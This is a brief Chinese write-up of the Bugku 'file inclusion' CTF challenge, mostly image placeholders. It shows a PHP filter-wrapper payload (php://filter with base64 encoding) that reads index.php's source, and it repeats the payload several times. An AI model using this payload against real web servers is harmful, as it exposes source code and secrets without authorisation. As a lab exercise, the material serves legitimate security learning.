bugku--文件包含

bugku--文件包含_第1张图片

bugku--文件包含_第2张图片

点击

bugku--文件包含_第3张图片

访问一下index.php

bugku--文件包含_第4张图片

页面报错

既然是文件包含就可以想到php伪协议

bugku--文件包含_第5张图片

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

bugku--文件包含_第6张图片

得到我们的flag  提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

你可能感兴趣的:(ctf)